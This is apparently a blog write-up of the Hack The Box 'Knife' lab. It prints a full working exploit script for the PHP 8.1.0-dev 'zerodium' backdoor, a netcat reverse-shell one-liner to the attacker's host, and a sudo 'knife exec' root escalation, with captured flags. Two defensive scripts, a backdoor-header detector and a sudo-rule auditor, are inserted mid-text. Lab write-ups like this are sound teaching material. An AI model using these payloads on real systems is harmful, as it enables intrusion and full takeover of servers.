Knife-htb-writeup

0x00 Skills Covered by This Box

Skills in this chapter: PHP 8.1.0-dev backdoor vulnerability, privilege escalation via a knife sudo misconfiguration

Reference: official guided mode

0x01 Getting User-Level Access

1. Get the target machine's IP address: 10.10.10.242

2. Scan for open ports and service versions

sudo nmap -sT -sV -sC -O -p"22,80," "10.10.10.242"

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)

3. Nothing special stands out here, so let's open port 80 and look at the website

4. After all sorts of directory scanning and googling the site's keywords, nothing useful turned up at all. In the end I checked the official guide; damn, it turned out to be the PHP version!!!

5. Wappalyzer reports that the site runs PHP 8.1.0; the browser's developer tools show the exact version as 8.1.0-dev

6. Search Google for a matching exploit

8.1.0-dev exploit

7. This version contains a backdoor

https://www.exploit-db.com/exploits/49933

#!/usr/bin/env python3
import requests

host = input("Enter the full host url:\n")
request = requests.Session()
response = request.get(host)

# Only proceed if the target answered the initial probe with HTTP 200
if response.status_code == 200:
    print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.")
    try:
        while 1:
            cmd = input("$ ")
            # The tampered PHP build evaluates what follows "zerodium" in the
            # bogus User-Agentt header as PHP code
            headers = {
                "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
                "User-Agentt": "zerodiumsystem('" + cmd + "');"
            }
            response = request.get(host, headers=headers, allow_redirects=False)
            current_page = response.text
            # Command output is emitted before the page's own HTML begins
            stdout = current_page.split('<!DOCTYPE html>', 1)
            print(stdout[0])
    except KeyboardInterrupt:
        print("Exiting...")
        exit()

else:
    print("\r")
    print(response)
    print("Host is not available, aborting...")
    exit()

8. Next, run the exploit against the target to confirm the vulnerability is present

┌──(kali㉿kali)-[~/桌面]
└─$ python3 exp.py
Enter the full host url:
http://10.10.10.242/

Interactive shell is opened on http://10.10.10.242/
Can't acces tty; job crontol turned off.
$ id
uid=1000(james) gid=1000(james) groups=1000(james)
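The defender's counterpart to the exploit above, as an added example that is not part of this writeup or of exploit-db 49933: a small checker that inspects raw HTTP requests for the backdoor trigger and flags a server banner advertising the backdoored build. It relies on a documented fact about the March 2021 php-src compromise, namely that the tampered build evaluates as PHP whatever follows "zerodium" in a bogus "User-Agentt" request header, which is exactly what the script above sends. The function names, the sample requests and the assumption that the version is visible in an X-Powered-By header are mine.

```python
import re

# Facts about the March 2021 php-src backdoor: the tampered build reads the
# bogus "User-Agentt" request header and evaluates what follows "zerodium" as
# PHP. The exploit on this page sends exactly that header.
BACKDOOR_HEADER = "user-agentt"
BACKDOOR_PREFIX = "zerodium"
# Assumption: the version banner is seen in an X-Powered-By response header.
VULNERABLE_BANNER = re.compile(r"PHP/8\.1\.0-dev\b", re.IGNORECASE)


def parse_raw_request(raw):
    """Split a raw HTTP/1.1 request into method, path and a header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:  # skip malformed lines without a colon
            headers[name.strip()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def inspect_request_headers(headers):
    """Return findings for one request's headers; [] means nothing suspicious."""
    lowered = {name.lower(): value for name, value in headers.items()}
    value = lowered.get(BACKDOOR_HEADER)
    if value is None:
        return []
    # Match the prefix anywhere, case-insensitively, to stay on the cautious side.
    pos = value.lower().find(BACKDOOR_PREFIX)
    if pos >= 0:
        payload = value[pos + len(BACKDOOR_PREFIX):]
        return ["backdoor-trigger: User-Agentt carries 'zerodium'; PHP payload %r" % payload]
    # "User-Agentt" is not a real header, so its mere presence is worth an alert.
    return ["suspicious-header: non-standard User-Agentt header present"]


def inspect_response_headers(headers):
    """Flag a server that advertises the backdoored build in its banner."""
    lowered = {name.lower(): value for name, value in headers.items()}
    banner = lowered.get("x-powered-by", "")
    if VULNERABLE_BANNER.search(banner):
        return ["vulnerable-version: server reports %s" % banner]
    return []


def scan_requests(raw_requests):
    """Run the request check over raw requests; return (index, finding) pairs."""
    hits = []
    for idx, raw in enumerate(raw_requests):
        for finding in inspect_request_headers(parse_raw_request(raw)["headers"]):
            hits.append((idx, finding))
    return hits


# Constructed sample traffic: a normal browser request and one shaped like the
# exploit's "id" command.
UA = "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
BENIGN_REQUEST = "GET / HTTP/1.1\r\nHost: 10.10.10.242\r\nUser-Agent: %s\r\n\r\n" % UA
TRIGGER_REQUEST = (
    "GET / HTTP/1.1\r\nHost: 10.10.10.242\r\nUser-Agent: %s\r\n"
    "User-Agentt: zerodiumsystem('id');\r\n\r\n" % UA
)

if __name__ == "__main__":
    for idx, finding in scan_requests([BENIGN_REQUEST, TRIGGER_REQUEST]):
        print("request %d: %s" % (idx, finding))
    print(inspect_response_headers({"X-Powered-By": "PHP/8.1.0-dev"}))
```

A default Apache access log does not record the User-Agentt header, so this check belongs where full request headers are visible (a reverse proxy, WAF or IDS), or a custom LogFormat has to capture that header first. The banner check is the quick way to confirm whether a server is still running the tampered build.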

9. Good, next is to grab the final user.txt

$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.9 443 >/tmp/f

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.242] 45346
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
james@knife:/$

james@knife:/$ cd /home/james
cd /home/james
james@knife:~$ ls -la
ls -la
total 40
drwxr-xr-x 5 james james 4096 May 18 2021 .
drwxr-xr-x 3 root root 4096 May 6 2021 ..
lrwxrwxrwx 1 james james 9 May 10 2021 .bash_history -> /dev/null
-rw-r--r-- 1 james james 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 james james 3771 Feb 25 2020 .bashrc
drwx------ 2 james james 4096 May 6 2021 .cache
drwxrwxr-x 3 james james 4096 May 6 2021 .local
-rw-r--r-- 1 james james 807 Feb 25 2020 .profile
-rw-rw-r-- 1 james james 66 May 7 2021 .selected_editor
drwx------ 2 james james 4096 May 18 2021 .ssh
-r-------- 1 james james 33 Dec 11 07:44 user.txt
james@knife:~$ cat user.txt
cat user.txt
986f5de877ca6770c36978c8e9e5e51d
james@knife:~$

0x02 Getting Root

10. sudo -l reveals an exploitable privilege escalation

james@knife:~$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
james@knife:~$
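The audit a defender would run against this rule, as an added example (not code from the writeup or from GTFOBins): parse `sudo -l` output, extract each rule, and flag root-equivalent rules whose binary is known to run arbitrary commands. The function names and the short binary list are mine; the sample input is the `sudo -l` output above.

```python
import re

# Short constructed list of binaries that run arbitrary commands as whoever
# invokes them; GTFOBins (which the writeup cites) keeps the full catalogue.
# knife is on it because "knife exec" evaluates arbitrary Ruby.
SHELL_ESCAPE_BINARIES = {"knife", "vim", "vi", "less", "more", "find",
                         "awk", "python3", "perl", "bash", "sh"}

# One rule line as printed by `sudo -l`: "(runas) TAG: TAG: command, command".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_l(output):
    """Return the rules listed after 'may run the following commands'."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        match = RULE_RE.match(line)
        if not match:
            continue
        runas_user = match.group("runas").split(":")[0].strip() or "root"
        tags = {t.rstrip(":") for t in match.group("tags").split()}
        for cmd in match.group("cmd").split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append({"runas": runas_user, "tags": tags, "command": cmd})
    return rules


def audit_rules(rules):
    """Return one finding per rule that hands the user a root shell."""
    findings = []
    for rule in rules:
        if rule["runas"] not in ("root", "ALL"):
            continue  # only root-equivalent rules are scored here
        cmd = rule["command"]
        suffix = " without a password" if "NOPASSWD" in rule["tags"] else ""
        if cmd == "ALL":
            findings.append("ALL as root%s" % suffix)
            continue
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_ESCAPE_BINARIES:
            findings.append("%s as root%s: %s can execute arbitrary commands" % (cmd, suffix, binary))
    return findings


# The `sudo -l` output from this writeup, used as sample input.
SAMPLE_SUDO_L = """Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
"""

if __name__ == "__main__":
    for finding in audit_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(finding)
```

The fix is to drop the rule, or run knife under a dedicated non-root account with only the permissions it needs. Trying to pin arguments in sudoers is not a reliable alternative, because knife subcommands such as exec evaluate arbitrary Ruby, which is precisely what the writeup's one-liner relies on.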

11. Following GTFOBins, a single command gets root and the flag file

james@knife:/$ sudo knife exec -E 'exec "/bin/sh"'
sudo knife exec -E 'exec "/bin/sh"'
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
cat /root/root.txt
6ae2bb5aba8203591469695a4557dbb1
#

0x03 Proof of Completion

https://www.hackthebox.com/achievement/machine/1705469/347


Knife-htb-writeup
https://sh1yan.top/2023/12/11/Knife-htb-writeup/
Author: shiyan
Published on: December 11, 2023